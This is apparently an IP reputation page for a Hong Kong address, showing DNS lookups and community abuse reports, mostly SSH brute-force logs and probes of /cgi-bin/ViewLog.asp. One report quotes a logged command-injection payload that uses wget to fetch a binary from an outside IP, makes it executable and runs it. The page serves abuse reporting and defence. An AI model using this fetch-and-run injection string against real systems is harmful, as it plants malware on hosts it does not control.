218.253.242.63

Basic Info

City: unknown

Region: unknown

Country: Hong Kong

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
218.253.242.224	attackspam	"Remote Command Execution: Unix Command Injection - Matched Data: ;chmod found within ARGS:remote_host: ;cd /tmp;wget h://142.11.199.235/arm7;chmod 777 arm7;./arm7;rm -rf arm7;#"	2020-07-08 15:11:13
218.253.242.36	attack	Automatic report - Port Scan Attack	2019-11-29 23:12:59
218.253.242.115	attack	[Sat Nov 23 12:36:17.260077 2019] [:error] [pid 26036] [client 218.253.242.115:44858] [client 218.253.242.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "127.0.0.1"] [uri "/cgi-bin/ViewLog.asp"] [unique_id "XdlR8OyVvAr7DjkOb0K9UAAAAAY"] ...	2019-11-24 03:54:49
218.253.242.28	attack	Seq 2995002506	2019-10-22 04:09:54
218.253.242.215	attackspam	218.253.242.215 [11/Oct/2019:23:06:18 +0100] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 218.253.242.215 [11/Oct/2019:23:06:18 +0100] "teSubmit=Save"	2019-10-12 20:30:05
218.253.242.151	attack	Ref: mx Logwatch report	2019-10-06 21:02:44
218.253.242.151	attackbotsspam	2019/10/04 19:51:45 [error] 7916#7916: 3959 open() "/srv/automx/instance/cgi-bin/ViewLog.asp" failed (2: No such file or directory), client: 218.253.242.151, server: autoconfig.tuxlinux.eu, request: "POST /cgi-bin/ViewLog.asp HTTP/1.1", host: "127.0.0.1" 2019/10/05 05:47:27 [error] 7917#7917: 4041 open() "/srv/automx/instance/cgi-bin/ViewLog.asp" failed (2: No such file or directory), client: 218.253.242.151, server: autoconfig.tuxlinux.eu, request: "POST /cgi-bin/ViewLog.asp HTTP/1.1", host: "127.0.0.1" ...	2019-10-05 17:34:54

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 218.253.242.63
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36877
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;218.253.242.63.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025021202 1800 900 604800 86400

;; Query time: 10 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 13 08:54:31 CST 2025
;; MSG SIZE  rcvd: 107

Host info

63.242.253.218.in-addr.arpa domain name pointer static.reserve.wtt.net.hk.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
63.242.253.218.in-addr.arpa	name = static.reserve.wtt.net.hk.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
222.186.175.23	attack	Apr 17 04:17:17 scw-6657dc sshd[2361]: Failed password for root from 222.186.175.23 port 30366 ssh2 Apr 17 04:17:17 scw-6657dc sshd[2361]: Failed password for root from 222.186.175.23 port 30366 ssh2 Apr 17 04:17:19 scw-6657dc sshd[2361]: Failed password for root from 222.186.175.23 port 30366 ssh2 ...	2020-04-17 12:20:18
35.220.130.113	attackbotsspam	Apr 17 03:50:07 ip-172-31-61-156 sshd[10690]: Failed password for root from 35.220.130.113 port 53748 ssh2 Apr 17 03:58:57 ip-172-31-61-156 sshd[10972]: Invalid user ob from 35.220.130.113 Apr 17 03:58:57 ip-172-31-61-156 sshd[10972]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=35.220.130.113 Apr 17 03:58:57 ip-172-31-61-156 sshd[10972]: Invalid user ob from 35.220.130.113 Apr 17 03:58:59 ip-172-31-61-156 sshd[10972]: Failed password for invalid user ob from 35.220.130.113 port 54814 ssh2 ...	2020-04-17 12:42:47
223.247.194.119	attackbotsspam	Apr 16 18:01:47 kapalua sshd\[25353\]: Invalid user id from 223.247.194.119 Apr 16 18:01:47 kapalua sshd\[25353\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.247.194.119 Apr 16 18:01:48 kapalua sshd\[25353\]: Failed password for invalid user id from 223.247.194.119 port 42182 ssh2 Apr 16 18:06:20 kapalua sshd\[25699\]: Invalid user admin from 223.247.194.119 Apr 16 18:06:20 kapalua sshd\[25699\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.247.194.119	2020-04-17 12:45:05
162.243.42.225	attack	Apr 16 18:07:51 hpm sshd\[28701\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 user=root Apr 16 18:07:53 hpm sshd\[28701\]: Failed password for root from 162.243.42.225 port 35804 ssh2 Apr 16 18:13:03 hpm sshd\[29163\]: Invalid user postgres from 162.243.42.225 Apr 16 18:13:03 hpm sshd\[29163\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 Apr 16 18:13:05 hpm sshd\[29163\]: Failed password for invalid user postgres from 162.243.42.225 port 43844 ssh2	2020-04-17 12:13:54
35.200.206.240	attackspam	$f2bV_matches	2020-04-17 12:27:41
109.116.196.174	attack	Apr 17 00:27:28 ny01 sshd[9931]: Failed password for root from 109.116.196.174 port 54568 ssh2 Apr 17 00:31:34 ny01 sshd[10559]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=109.116.196.174 Apr 17 00:31:37 ny01 sshd[10559]: Failed password for invalid user en from 109.116.196.174 port 35170 ssh2	2020-04-17 12:34:40
190.85.34.142	attackspam	SSH login attempts brute force.	2020-04-17 12:43:54
59.9.210.52	attack	Apr 17 05:58:44 pornomens sshd\[22240\]: Invalid user pe from 59.9.210.52 port 53283 Apr 17 05:58:44 pornomens sshd\[22240\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=59.9.210.52 Apr 17 05:58:47 pornomens sshd\[22240\]: Failed password for invalid user pe from 59.9.210.52 port 53283 ssh2 ...	2020-04-17 12:50:05
183.89.212.15	attack	IMAP brute force ...	2020-04-17 12:28:11
52.183.95.205	attackspam	Invalid user zxin10 from 52.183.95.205 port 56952	2020-04-17 12:11:22
14.99.4.82	attackbots	Apr 17 04:28:06 localhost sshd[74848]: Invalid user nisec from 14.99.4.82 port 62790 Apr 17 04:28:06 localhost sshd[74848]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.99.4.82 Apr 17 04:28:06 localhost sshd[74848]: Invalid user nisec from 14.99.4.82 port 62790 Apr 17 04:28:08 localhost sshd[74848]: Failed password for invalid user nisec from 14.99.4.82 port 62790 ssh2 Apr 17 04:32:13 localhost sshd[75278]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.99.4.82 user=root Apr 17 04:32:14 localhost sshd[75278]: Failed password for root from 14.99.4.82 port 64950 ssh2 ...	2020-04-17 12:34:04
185.220.100.243	attack	sshd jail - ssh hack attempt	2020-04-17 12:18:41
180.104.175.172	attackbotsspam	Banned by Fail2Ban.	2020-04-17 12:53:09
106.13.73.210	attackbots	$f2bV_matches	2020-04-17 12:32:24
152.136.114.118	attackbots	SSH Brute-Force reported by Fail2Ban	2020-04-17 12:45:50

Recently Reported IPs

221.81.48.27	56.212.111.19	219.87.10.70	224.178.3.35
255.142.50.244	243.231.4.4	59.175.192.145	240.69.18.93
232.60.195.90	227.75.27.195	240.197.226.73	21.57.139.239
213.29.198.43	123.158.15.203	106.40.254.17	191.10.249.22
189.10.53.212	240.235.58.118	116.71.238.178	210.157.16.120